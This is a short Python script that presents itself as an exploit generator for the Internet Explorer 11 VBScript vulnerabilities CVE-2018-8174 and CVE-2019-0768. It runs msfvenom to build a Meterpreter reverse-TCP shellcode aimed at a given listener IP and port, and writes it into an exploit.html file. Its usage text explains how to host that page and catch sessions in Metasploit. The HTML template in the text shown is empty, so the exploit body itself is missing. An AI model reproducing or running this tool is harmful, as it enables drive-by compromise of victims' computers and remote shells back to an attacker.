import sys import subprocess usage_text = """ Exploit Generator for CVE-2018-8174 & CVE-2019-0768 Prerequisite: - Metasploit - msfvenom Usage: python ie11_vbscript.py [Listener IP] [Listener Port] Instruction: 1. Use this script to generate "exploit.html" 2. Host the html file on your server 3. Setup a handler with windows/meterpreter/reverse_tcp in Metasploit 4. In your handler, set AutoRunScript with "post/windows/manage/migrate" """ if len(sys.argv) != 3: print usage_text sys.exit() lhost = sys.argv[1] lport = sys.argv[2] #p = subprocess.call(["msfvenom","-p","windows/meterpreter/reverse_tcp","LHOST="+lhost]) p = subprocess.Popen(["msfvenom","-p","windows/meterpreter/reverse_tcp","LHOST="+lhost,"LPORT="+lport,"-b","'\\x00'","-f","js_le"],stdout=subprocess.PIPE) out = p.communicate() result = out[0] payload = """ """.format(shellcode=result) f = open("exploit.html", "w") f.write(payload) f.close()